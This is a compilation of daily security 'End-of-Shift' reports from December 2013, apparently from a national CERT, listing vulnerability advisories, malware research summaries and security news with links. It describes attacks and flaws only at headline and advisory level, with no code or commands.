*** Strange DNS Queries - Request for Packets, (Sat, Dec 21st) ***
---------------------------------------------
We have received a pcap sample of DNS queries that display a strange behavior. The queries are type ANY for domains ghmn.ru and fkfkfkfa.com. When doing an nslookup, both domains have 100 IPs listed under their domain names, with each of them resolving to exactly the same last octets (i.e. .1, .10, .100, etc). Queries with the same transaction ID are often repeated several times. The traffic samples we have received indicate the queries are sent by either a host or a server. If anyone else is...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17264&rss
*** evasiOn7: Jailbreak for iOS 7 - with controversial features ***
---------------------------------------------
A first jailbreak for iOS 7, which allows apps to be installed outside Apple's App Store, is available. However, it immediately fell into disrepute because it integrates a Chinese app store offering pirated copies and because its code is obfuscated.
---------------------------------------------
http://www.heise.de/security/meldung/evasiOn7-Jailbreak-fuer-iOS-7-mit-umst…
*** Backdoor in crypto software: RSA Security denies NSA payments ***
---------------------------------------------
RSA Security stresses that it has "never entered into a secret contract with the NSA to incorporate a known flawed random number generator into the BSAFE encryption libraries" - but by no means denies cooperation with the NSA.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Backdoor-in-Krypto-Software-RSA-Secu…
*** Anti-brute-force tool DenyHosts locks admins out ***
---------------------------------------------
Admins who protect their servers against brute-force attacks with DenyHosts must act - otherwise they may soon find themselves locked out.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Anti-Bruteforce-Tool-DenyHosts-sperr…
*** How I hacked a journalist ***
---------------------------------------------
It started off as a follow-up to a story a journalist had written several years ago. The story was about data protection, and had shown that a simple subject access request could provide you with enough information to steal someone's identity. Now, Claudia Joseph wanted to see if anything had changed and to update the world on the new dangers. What would happen if somebody was able to infiltrate your online life? Claudia contacted us and started the conversation with "Can you hack...
---------------------------------------------
http://www.nccgroup.com/en/blog/2013/12/how-i-hacked-a-journalist/
*** Practical malleability attack against CBC-Encrypted LUKS partitions ***
---------------------------------------------
Topic: Practical malleability attack against CBC-Encrypted LUKS partitions
Risk: Medium
Text: Article location: http://www.jakoblell.com/blog/2013/12/22/practical-malleability-attack-agai…...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120153
*** Alert: Adobe License Key Email Scam ***
---------------------------------------------
Adobe is aware of reports that a phishing campaign is underway involving malicious email purporting to deliver license keys for a variety of Adobe offerings. Customers who receive one of these emails should delete it immediately without downloading attachments or...
---------------------------------------------
http://blogs.adobe.com/psirt/2013/12/20/alert-adobe-license-key-email-scam/
*** [webapps] - Jenkins 1.523 - Inject Persistent HTML Code ***
---------------------------------------------
http://www.exploit-db.com/exploits/30408
*** Security Bulletin: Multiple vulnerabilities in current IBM SDK for Java for WebSphere Application Server Community 3.0.0.4 October 2013 CPU (CVE-2013-5802,CVE-2013-5825) ***
---------------------------------------------
Multiple security vulnerabilities exist in the IBM SDK for Java that is shipped with IBM WebSphere Application Server Community 3.0.0.4.
CVE(s): CVE-2013-5802, and CVE-2013-5825
Affected product(s) and affected version(s): WebSphere Application Server Community Edition 3.0.0.4
Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www.ibm.com/support/docview.wss?uid=swg21660594
X-Force Database:...
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Security Bulletin: Fix available for Unauthorized Information Retrieval Security Vulnerability in IBM WebSphere Portal (CVE-2013-6735) ***
---------------------------------------------
A fix that blocks unauthorized information retrieval is available for a security vulnerability in IBM WebSphere Portal.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21660289
*** Wordpress information leakage and backdoor in writing settings ***
---------------------------------------------
Topic: Wordpress information leakage and backdoor in writing settings
Risk: High
Text: Hello list! As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordPr...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120152
*** Synology DiskStation Manager (DSM) multiple scripts directory traversal ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89892
*** Avant Browser Rendering Engines Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56242
*** Nagios "process_cgivars()" Off-By-One Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/55976
Next End-of-Shift Report on 2013-12-27
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 19-12-2013 18:00 − Friday 20-12-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Do You Hear What I Hear? ***
---------------------------------------------
This article, recently published in the Journal of Communications, adds another log to the BadBIOS fire. It has been stated that devices in the BadBIOS case are communicating across an air-gap with commodity PC audio hardware. This paper clearly spells out one workable way to communicate in this way. Even if this doesn't end up...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/XrnMZDjVZpk/
*** NSA's broken Dual_EC random number generator has a "fatal bug" in OpenSSL ***
---------------------------------------------
No plans to fix a bug in "toxic" algorithm that no one seems to use.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/DAvvFpw-R04/story01…
*** Microsoft warns of signed malware ***
---------------------------------------------
More and more malware carries a valid digital signature. The signatures are typically created with stolen developer certificates.
---------------------------------------------
http://www.heise.de/security/meldung/Microsoft-warnt-vor-signierter-Malware…
*** Exploiting Password Recovery Functionalities ***
---------------------------------------------
Password recovery functionalities can result in vulnerabilities in the same application they are intended to protect. Vulnerabilities such as username enumeration (showing different error messages depending on whether the user exists in the database), sensitive information disclosure (sending the password in clear text by e-mail to the user) and recovery message hijacking (an attacker receiving a copy of the password recovery message) are some common vulnerabilities that may be found in a...
---------------------------------------------
http://blog.spiderlabs.com/2013/12/exploiting-password-recovery-functionali…
*** Quick Joomla Refresher ***
---------------------------------------------
I haven't come into contact with Joomla for a while, but I had the opportunity recently in a penetration test of a web site that was running the popular Content Management System (CMS). In this blog post I mention some of the tools I used to check the security of a particular Joomla installation and comment upon their effectiveness. Depending on your source, Joomla is within the top five contenders for the most popular CMS. Alternatives include WordPress, Drupal and others. CMS frameworks have...
---------------------------------------------
http://blog.spiderlabs.com/2013/12/quick-joomla-refresher.html
*** Not quite the average exploit kit: Zuponcic ***
---------------------------------------------
This post connects three recent developments in the realm of malware infections: .htaccess server compromise, the Zuponcic exploit kit and the Ponmocup botnet. It seems that the de facto standard of exploit kits is getting competition. Understanding how this exploit kit works will give you a better chance of defending against it and of identifying the .htaccess compromise on your server.
---------------------------------------------
http://blog.fox-it.com/2013/12/19/not-quite-the-average-exploit-kit-zuponci…
*** After BKA operation: ZeroAccess botnet gives up ***
---------------------------------------------
The masterminds behind the ZeroAccess botnet are waving the virtual white flag. After further actions by law enforcement agencies, they have apparently given up bot herding for the time being.
---------------------------------------------
http://www.heise.de/security/meldung/Nach-BKA-Einsatz-ZeroAccess-Botnetz-st…
*** Digital forensics: Unsolved problems in securing evidence from digital artefacts ***
---------------------------------------------
Quite a few problems in securing evidence from digital artefacts are still far from solved, as became clear at the Forensics and Internet Crime workshop. The BSI contributed a situation report that assumes an unbroken rise in cybercrime.
---------------------------------------------
http://www.heise.de/security/meldung/Digitale-Forensik-Ungeloeste-Probleme-…
*** BitTorrent presents peer-to-peer chat system ***
---------------------------------------------
In response to the blanket NSA snooping, BitTorrent has developed a chat system that needs no central server and enables anonymous, encrypted communication.
---------------------------------------------
http://www.heise.de/security/meldung/BitTorrent-stellt-Peer-to-Peer-Chat-Sy…
*** Another OpenX vulnerability is being actively exploited ***
---------------------------------------------
Critical security vulnerabilities in the current version of the ad server software OpenX and in its fork Revive are being used to distribute malware. CERT-Bund notifies several affected server operators every day.
---------------------------------------------
http://www.heise.de/security/meldung/Erneute-Luecke-in-OpenX-wird-aktiv-aus…
*** Virus statistics: Grim retrospective, even grimmer outlook ***
---------------------------------------------
The year 2014 holds a particularly large number of digital attacks for smartphone users, say antivirus vendors after evaluating their statistics.
---------------------------------------------
http://www.heise.de/security/meldung/Viren-Statistiken-Rueckblick-finster-A…
*** RSA Archer eGRC Input Validation Flaws Permit Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1029523
*** WordPress URL Redirector Abuse and XSS vulnerabilities ***
---------------------------------------------
Topic: WordPress URL Redirector Abuse and XSS vulnerabilities
Risk: Low
Text: Hello list! As I've announced earlier (http://seclists.org/fulldisclosure/2013/Nov/219), I conducted a Day of bugs in WordP...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120142
*** Google Picasa RAW Image Parsing Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/55555
*** cPanel Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56146
*** Hitachi Cosminexus Products XML External Entities Information Disclosure Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56142
*** IBM Security Access Manager for Enterprise Single Sign-On Security Issue and Two Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56176
*** Revive Adserver "what" SQL Injection Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/55963
*** Apache Santuario DTD Processing Flaw Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1029524
*** Apple Motion Memory Access Error Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1029521
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 18-12-2013 18:00 − Thursday 19-12-2013 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
*** IBM HTTP Server GSKit SSLv2 Session Resuming Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability has been reported in IBM HTTP Server, which can be exploited by malicious people to cause a DoS (Denial of Service).
---------------------------------------------
https://secunia.com/advisories/56058
*** Tor use best practices ***
---------------------------------------------
To date the NSA's and FBI's primary attacks on Tor users have been MITM attacks (NSA) and hidden service web server compromises (FBI) which either sent tracking data to the Tor user's computer, compromised it, or both. Thus you need a reasonably secure system from which you can use Tor and reduce your risk of being tracked or compromised.
---------------------------------------------
http://digital-era.net/tor-use-best-practices/
*** New DDoS Bot Has a Fancy For Ferrets ***
---------------------------------------------
Researchers at Arbor Networks have discovered a new denial of service botnet called Trojan.Ferret.
---------------------------------------------
http://threatpost.com/new-ddos-bot-has-a-fancy-for-ferrets/103226
*** WordPress S3 Video Plugin "base" Cross-Site Scripting Vulnerability ***
---------------------------------------------
Input passed to the "base" GET parameter in wp-content/plugins/s3-video/views/video-management/preview_video.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerability is confirmed in version 0.96 and reported in versions prior to 0.983.
---------------------------------------------
https://secunia.com/advisories/56167
*** IrfanView GIF buffer overflow ***
---------------------------------------------
IrfanView is vulnerable to a heap-based buffer overflow, caused by improper bounds checking when processing the LZW code stream within GIF files. By persuading a victim to open a specially-crafted GIF file containing an overly long LZW code stream, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89820
*** NovaTech Orion DNP3 Improper Input Validation Vulnerability ***
---------------------------------------------
Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the NovaTech Orion Substation Automation Platform. NovaTech has produced a firmware update that mitigates this vulnerability. The researchers have tested the firmware update to validate that it resolves the vulnerability. This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-352-01
*** IBM iNotes email message active content cross-site scripting ***
---------------------------------------------
IBM iNotes is vulnerable to cross-site scripting, caused by improper validation of active content within an email message. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials or other sensitive information.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/86594
*** IBM iNotes ultra-light mode persistent cross-site scripting ***
---------------------------------------------
IBM iNotes is vulnerable to cross-site scripting in the ultra-light mode, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability to inject and execute malicious script in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials or other sensitive information.
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/86595
*** SSA-742938 (Last Update 2013-12-17): Open Ports in SINAMICS S/G Firmware ***
---------------------------------------------
SSA-742938 (Last Update 2013-12-17): Open Ports in SINAMICS S/G Firmware
---------------------------------------------
https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit…
*** SA-CONTRIB-2013-098 - Ubercart - Session Fixation Vulnerability ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2013-098
Project: Ubercart (third-party module)
Version: 6.x, 7.x
Date: 2013-12-18
Security risk: Less critical
Exploitable from: Remote
Vulnerability: Session Fixation
Description
The Ubercart module for Drupal provides a shopping cart and e-commerce features for Drupal. The module doesn't sufficiently protect against session fixation attacks when a user is automatically logged in to a newly created account during checkout. This vulnerability is mitigated by the fact that
---------------------------------------------
https://drupal.org/node/2158651
*** Researchers propose international vulnerability purchase plan ***
---------------------------------------------
In a bid to cut down on costs and eliminate potential misuse, NSS Labs has put forth an initiative imploring vendors to purchase vulnerabilities.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/I9nD_zWQzsI/
*** cURL Certificate Validation Flaw Lets Remote Users Spoof SSL Servers ***
---------------------------------------------
A vulnerability was reported in cURL. A remote user that can conduct a man-in-the-middle attack can spoof SSL servers.
The software does not properly verify the certificate CN or SAN name field in certain cases. A remote user that can conduct a man-in-the-middle attack can spoof SSL servers.
Systems that use GnuTLS as the TLS backend are affected.
Systems with digital signature verification (CURLOPT_SSL_VERIFYPEER) disabled are affected.
---------------------------------------------
http://www.securitytracker.com/id/1029517
*** OpenJPEG Heap Overflows Let Remote Users Execute Arbitrary Code ***
---------------------------------------------
Several vulnerabilities were reported in OpenJPEG. A remote user can cause arbitrary code to be executed on the target user's system. A remote user can cause denial of service conditions.
A remote user can create a specially crafted image file that, when loaded by the target user, will trigger a heap overflow and execute arbitrary code on the target system [CVE-2013-6045, CVE-2013-6054]. The code will run with the privileges of the target user.
A remote user can create a specially crafted image file that, when loaded by the target user, will cause the application that uses OpenJPEG to crash [CVE-2013-1447, CVE-2013-6052].
---------------------------------------------
http://www.securitytracker.com/id/1029514
*** Splunk Enterprise Data Processing Flaw Lets Remote Users Deny Service ***
---------------------------------------------
A vulnerability was reported in Splunk Enterprise. A remote user can cause denial of service conditions.
A remote user can send specially crafted data to cause the target server to become unavailable.
Systems configured as data 'receivers' on the listening or receiving port(s) are affected, including instances configured as indexers and forwarders configured as intermediate forwarders.
---------------------------------------------
http://www.securitytracker.com/id/1029519
*** Blog: Malware in metadata ***
---------------------------------------------
One of the systems I have been running collects all our web malware detections for .ES domains. I usually check it out every morning, just in case I see something especially interesting or relevant. And when I find something, I like to create some statistics to have a global overview. There are some things that I find every time I check my stats, like URLs that have been infected for more than 200 days, even after being notified. That speaks of the lack of security awareness at some companies, and how
---------------------------------------------
http://www.securelist.com/en/blog/208214192/Malware_in_metadata
*** Factsheet Stop using Windows XP ***
---------------------------------------------
Microsoft will stop issuing Windows XP updates as of 8 April 2014. The operating system will receive the end-of-life status. The NCSC advises, together with DefCERT, Microsoft and Team High Tech Crime, to no longer use Windows XP, but to switch to another operating system.
---------------------------------------------
http://www.ncsc.nl/english/services/expertise-advice/knowledge-sharing/fact…
*** Cisco Unified Communications Manager Sensitive Information Disclosure Vulnerability ***
---------------------------------------------
A vulnerability in the disaster recovery system (DRS) of Cisco Unified Communications Manager (UCM) could allow an authenticated, remote attacker to acquire sensitive information about DRS-related devices.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013…
*** [Announce] [security fix] GnuPG 1.4.16 released ***
---------------------------------------------
Along with the publication of an interesting new side channel attack by Daniel Genkin, Adi Shamir, and Eran Tromer we announce the availability of a new stable GnuPG release to relieve this bug: Version 1.4.16. [...]
What's New
===========
* Fixed the RSA Key Extraction via Low-Bandwidth Acoustic Cryptanalysis attack as described by Genkin, Shamir, and Tromer. See . [CVE-2013-4576]
---------------------------------------------
http://lists.gnupg.org/pipermail/gnupg-devel/2013-December/028102.html
*** Acoustic Cryptanalysis ***
---------------------------------------------
This is neat: Here, we describe a new acoustic cryptanalysis key extraction attack, applicable to GnuPG's current implementation of RSA. The attack can extract full 4096-bit RSA decryption keys from laptop computers (of various models), within an hour, using the sound generated by the computer during the decryption of some chosen ciphertexts. We experimentally demonstrate that such attacks can be...
---------------------------------------------
https://www.schneier.com/blog/archives/2013/12/acoustic_crypta.html
*** Apache XML Security Transforms Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability has been reported in Apache XML Security, which can be exploited by malicious people to cause a DoS (Denial of Service) in an application using the library.
The vulnerability is caused due to an error when applying Transforms and can be exploited to exhaust memory resources and cause a crash.
The vulnerability is reported in versions prior to 1.5.6.
---------------------------------------------
https://secunia.com/advisories/55639
*** TRENDnet Multiple Products Telnet Security Bypass Vulnerability ***
---------------------------------------------
A vulnerability has been reported in multiple TRENDnet products, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to a certain undocumented functionality, which can be exploited to enable telnet management and subsequently manipulate device configuration.
---------------------------------------------
https://secunia.com/advisories/55890
*** Icinga Off-By-One and Buffer Overflow Vulnerabilities ***
---------------------------------------------
Some vulnerabilities have been reported in Icinga, which can be exploited by malicious users to potentially cause a DoS (Denial of Service) and compromise a vulnerable system.
1) Some boundary errors within the web interface when processing CGI parameters can be exploited to cause stack-based buffer overflows.
Successful exploitation of this vulnerability may allow execution of arbitrary code.
2) An off-by-one error within the "process_cgivars()" function can be exploited to cause an out of bounds read memory access.
The vulnerabilities are reported in versions prior to 1.10.2, 1.9.4, and 1.8.5.
---------------------------------------------
https://secunia.com/advisories/55987
*** Icinga Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
A vulnerability has been reported in Icinga, which can be exploited by malicious people to conduct cross-site request forgery attacks.
The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions if a logged-in administrator visits a malicious web site.
The vulnerability is reported in version 1.10.2. Other versions may also be affected.
---------------------------------------------
https://secunia.com/advisories/55990
*** A peek inside the booming underground market for stealth Bitcoin/Litecoin mining tools ***
---------------------------------------------
The over-hyped market valuation of the buzzing P2P e-currency, Bitcoin, quickly gained the attention of cybercriminals internationally, who promptly adapted to its skyrocketing valuation by releasing commercially available stealth Bitcoin miners and Bitcoin wallet-stealing malware, as well as actually starting to offer the source code for their releases in an attempt to monetize their know-how and expertise in this area. Throughout 2013, we profiled several subscription-based stealth Bitcoin
---------------------------------------------
http://feedproxy.google.com/~r/WebrootThreatBlog/~3/nKXPdGwlKk4/
*** IBM Domino / iNotes Script Insertion and Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been reported in IBM Domino and IBM iNotes, which can be exploited by malicious users to conduct script insertion attacks and by malicious people to conduct cross-site scripting attacks.
---------------------------------------------
https://secunia.com/advisories/56164
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 17-12-2013 18:00 − Wednesday 18-12-2013 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Cybercriminals offer fellow cybercriminals training in Operational Security (OPSEC) ***
---------------------------------------------
In need of a fresh example that malicious and fraudulent adversaries continue professionalizing, and standardizing demanded cybercrime-friendly products and services, all for the sake of monetizing their experience and expertise in the profitable world of cybercrime? Publicly launched around the middle of 2013, a product/training course targeting novice cybercriminals is offering them a manual, recommendations for open source/free software, as well as access to a private forum set up for...
---------------------------------------------
http://www.webroot.com/blog/2013/12/17/cybercriminals-offer-fellow-cybercri…
*** Apple plugs holes in WebKit and Safari ***
---------------------------------------------
With Safari versions 6.1.1 and 7.0.1, Apple fixes several memory management bugs in WebKit that can be abused to execute malicious code over the Internet.
---------------------------------------------
http://www.heise.de/security/meldung/Apple-stopft-Luecken-in-WebKit-und-Saf…
*** DGA Changer Malware Able to Modify Domain-Generation Seed on the Fly ***
---------------------------------------------
Malware authors have been using domain-generation algorithms for a few years now, often in botnet-related malware that needs to stay one step ahead of takedown attempts and law enforcement agencies. Now, researchers have discovered that a strain of malware that may have been part of the attack in October on PHP.net is employing a DGA...
---------------------------------------------
http://threatpost.com/dga-changer-malware-able-to-modify-domain-generation-…
*** The Biggest Skimmers of All: Fake ATMs ***
---------------------------------------------
This blog has spotlighted some incredibly elaborate and miniaturized ATM skimmers, fraud devices that thieves attach to ATMs in a bid to steal card data and PINs. But a skimmer discovered in Brazil last month takes this sort of fraud to another level, using a completely fake ATM designed to be stacked directly on top...
---------------------------------------------
http://krebsonsecurity.com/2013/12/the-biggest-skimmers-of-all-fake-atms/
*** A quick look at a (new?) cross-platform DDoS botnet ***
---------------------------------------------
At the beginning of December we started to observe a new botnet spreading on both Linux and Windows machines. In the case of Linux, the bot was installed through an SSH dictionary attack. The attacker logged in to the compromised server and simply downloaded and executed a bot file. The malware...
---------------------------------------------
https://www.cert.pl/news/7849/langswitch_lang/en
*** [SECURITY] [DSA 2821-1] gnupg security update ***
---------------------------------------------
http://lists.debian.org/debian-security-announce/2013/msg00235.html
*** Cisco ONS 15454 Transport Node Controller Denial of Service Vulnerability ***
---------------------------------------------
An issue in the tNetTaskLimit process of the Cisco ONS 15454 Transport Node Controller (TNC) could allow an unauthenticated, remote attacker to cause the TNC to reload due to a watchdog timeout.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013…
*** Security Bulletin: Multiple vulnerabilities in IBM SPSS Collaboration and Deployment Services ***
---------------------------------------------
Multiple vulnerabilities exist in IBM SPSS Collaboration and Deployment Services. See the individual descriptions for details.
---------------------------------------------
http://www-01.ibm.com/support/docview.wss?uid=swg21660191
*** IBM Scale Out Network Attached Storage (SONAS) Multiple Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been reported in IBM Scale Out Network Attached Storage, which can be exploited by malicious people to conduct spoofing attacks, disclose potentially sensitive information, bypass certain security restrictions, and compromise a user's system.
---------------------------------------------
https://secunia.com/advisories/56095
*** Security Bulletin: GSKit SSL negotiation vulnerability in Tivoli Access Manager for e-business (CVE-2013-6329) ***
---------------------------------------------
A vulnerability has been identified in the GSKit component utilized by Tivoli Access Manager for e-business (TAM). A specially crafted SSL message can cause the TAM server component using GSKit to crash.
CVE(s): CVE-2013-6329
Affected product(s) and affected version(s): All supported Tivoli Access Manager for e-business versions are affected.
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_gsk…
*** RealOne RMP File Heap Overflow Lets Remote Users Execute Arbitrary Code ***
---------------------------------------------
http://www.securitytracker.com/id/1029511
*** Vuln: Juvia Ruby on Rails secret_token.rb Default Secret Key Security Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/64368
*** Vuln: ownCloud Admin Page Unspecified Security Bypass Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/63926
*** Zimbra Collaboration Server Unspecified Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56138
*** Python Hash Collision Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/55955
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 16-12-2013 18:00 − Tuesday 17-12-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Rapid7 Webcasts: A Great Week to Learn About Pentesting SAP Infrastructures ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2013/12/16/rapid7-we…
*** Three Books You Too Should Read This Year (Or Early 2014) ***
---------------------------------------------
For the holiday season, The Grumpy Reader fishes out a selection of recent books you should read even if you think you're too busy. I'm sure you've had that feeling too: There are times when there's too much coming your way when you're already busy, so some things just fall by the wayside for too long. In my case the victims of my unpredictable schedule were books that publishers sent me for review in one form or the other, and those reviews just never got written as I wanted to in between other...
---------------------------------------------
http://bsdly.blogspot.com/2013/12/three-books-you-too-should-read-this.html
*** How hackers made minced meat of Department of Energy networks ***
---------------------------------------------
Hint: Some critical security patches not installed for years.
---------------------------------------------
http://feeds.arstechnica.com/~r/arstechnica/security/~3/HKg_RoYby0g/story01…
*** Predictions for 2014 and the December 2013 Security Bulletin Webcast, Q&A, and Slide Deck ***
---------------------------------------------
Today we're publishing the December 2013 Security Bulletin Webcast Questions & Answers page. We answered 17 questions in total, with the majority of questions focusing on the Graphics Component bulletin (MS13-096), Security Advisory 2915720 and Security Advisory 2905247. We also wanted to note a new blog on the Microsoft Security Blog site on the top cyber threat predictions for 2014. Topics from ransomware to regulation are covered by seven of Trustworthy Computing's top...
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2013/12/16/predictions-for-2014-and…
*** Dissection of Zertsecurity - Banking Trojan. ***
---------------------------------------------
Zertsecurity is a well-known banking Trojan based on phishing schemes targeting German Android users. Let's see how it works. After installing the application, it prompts the user for account and PIN numbers. The application takes the values of the account and PIN numbers via input boxes and saves them to the cfg.txt file. It then sends this file to a remote command and control (C&C)...
---------------------------------------------
http://research.zscaler.com/2013/12/dissection-of-zertsecurity-banking.html
*** The Case for a Compulsory Bug Bounty ***
---------------------------------------------
Security experts have long opined that one way to make software more secure is to hold software makers liable for vulnerabilities in their products. This idea is often dismissed as unrealistic and one that would stifle innovation in an industry that has been a major driver of commercial growth and productivity over the years. But a new study released this week presents perhaps the clearest economic case yet for compelling companies to pay for information about security vulnerabilities in their...
---------------------------------------------
http://krebsonsecurity.com/2013/12/the-case-for-a-compulsory-bug-bounty/
*** Big Data in Security ***
---------------------------------------------
Cisco's TRAC team on Big Data security challenges, tools and methodologies.
---------------------------------------------
http://blogs.cisco.com/security/big-data-in-security-part-i-trac-tools/
http://blogs.cisco.com/security/big-data-in-security-part-ii-the-amplab-sta…
http://blogs.cisco.com/security/big-data-in-security-part-iii-graph-analyti…
http://blogs.cisco.com/security/big-data-in-security-part-iv-email-auto-rul…
http://blogs.cisco.com/security/big-data-in-security-part-v-anti-phishing-i…
*** Background: iOS encryption examined ***
---------------------------------------------
In addition to hardware encryption, iOS also offers optional file encryption. In iOS 7, Apple has automated its use for apps. However, Apple grants itself generous exceptions for its own applications.
---------------------------------------------
http://www.heise.de/security/artikel/iOS-Verschluesselung-durchleuchtet-206…
*** Android anti-virus apps CAN'T kill nasties on sight like normal AV - and that's Google's fault ***
---------------------------------------------
Bad news if you're not a tech-savvy fandroid. Android users expecting Windows levels of performance from Android-specific anti-virus packages are likely to be disappointed because only Google can automatically delete dodgy apps on Android devices, say malware experts.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2013/12/17/android_ant…
*** Apple security updates Mac OS X and Safari, (Tue, Dec 17th) ***
---------------------------------------------
Apple have released the following security advisories and updates for Mac OS X and Safari. OS X Mavericks v10.9.1 and APPLE-SA-2013-12-16-1 Safari 6.1.1 and Safari 7.0.1. More information will be available from their web site: http://support.apple.com/kb/HT1222
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17234
*** Blog: ChewBacca - a new episode of Tor-based Malware ***
---------------------------------------------
We have discovered a new Tor-based malware, named "ChewBacca" and detected as "Trojan.Win32.Fsysna.fej". Adding Tor to malware is not unique to this sample, but it's still a rare feature. Lately Tor has become more attractive as a service to ensure users' anonymity. Also criminals use it for their activities, but they are only slowly adopting this to host their malicious infrastructure.
---------------------------------------------
http://www.securelist.com/en/blog/208214185/ChewBacca_a_new_episode_of_Tor_…
*** Trojan.Skimer.18 infects ATMs ***
---------------------------------------------
December 16, 2013. Russian anti-virus company Doctor Web is warning users about the Trojan program Trojan.Skimer.18. The criminals behind this malware are targeting ATMs of one of the world's largest manufacturers. The Trojan can intercept and transmit bank card information processed by ATMs as well as data stored on the card and its PIN code. Trojan.Skimer.18 is by no means the first backdoor to infect ATM software, but it is the first to target devices so common throughout the world. The
---------------------------------------------
http://news.drweb.com/show/?i=4167&lng=en&c=9
*** Cisco EPC3925 cross-site request forgery ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89713
*** Bugtraq: [security bulletin] HPSBHF02953 rev.1 - HP B-series SAN Network Advisor, Remote Code Execution ***
---------------------------------------------
http://www.securityfocus.com/archive/1/530357
*** Asterisk Dialplan Functions Let Remote Authenticated Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1029500
*** Asterisk SMS Message Buffer Overflow Lets Remote Users Deny Service ***
---------------------------------------------
http://www.securitytracker.com/id/1029499
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 13-12-2013 18:00 − Monday 16-12-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** Bitcoin Mining Operation Seen Across Numerous Malware Families ***
---------------------------------------------
The talent over at Malwarebytes broke a story this week regarding Fake Flash Player phishing attempts dropping malicious content onto victim machines for the purpose of mining Bitcoins. The threat tricks users into thinking that they are downloading a new version of Flash Player. In actuality, the threat drops a few malicious executables (stored in "[username]/AppData/Roaming/Data"), called...
---------------------------------------------
http://research.zscaler.com/2013/12/bitcoin-mining-operation-seen-across.ht…
*** IETF To Change TLS Implementation In Applications ***
---------------------------------------------
Trailrunner7 writes "The NSA surveillance scandal has created ripples all across the Internet, and the latest one is a new effort from the IETF to change the way that encryption is used in a variety of critical application protocols, including HTTP and SMTP. The new TLS application working group was formed to help developers and the people who deploy their applications incorporate the encryption protocol correctly. TLS is the successor to SSL and is used to encrypt information in a variety...
---------------------------------------------
http://rss.slashdot.org/~r/Slashdot/slashdot/~3/5p7fpD5WwtY/story01.htm
*** Predictions for 2014 ***
---------------------------------------------
2014 is less than one month away, what better time to ask ourselves about the top security trends to watch for in the coming year. Malware Creation: OK, this won't sound too original but it is a safe bet to say that malware creation will hit a new record high in 2014. Actually, such was...
---------------------------------------------
http://pandalabs.pandasecurity.com/predictions-for-2014/
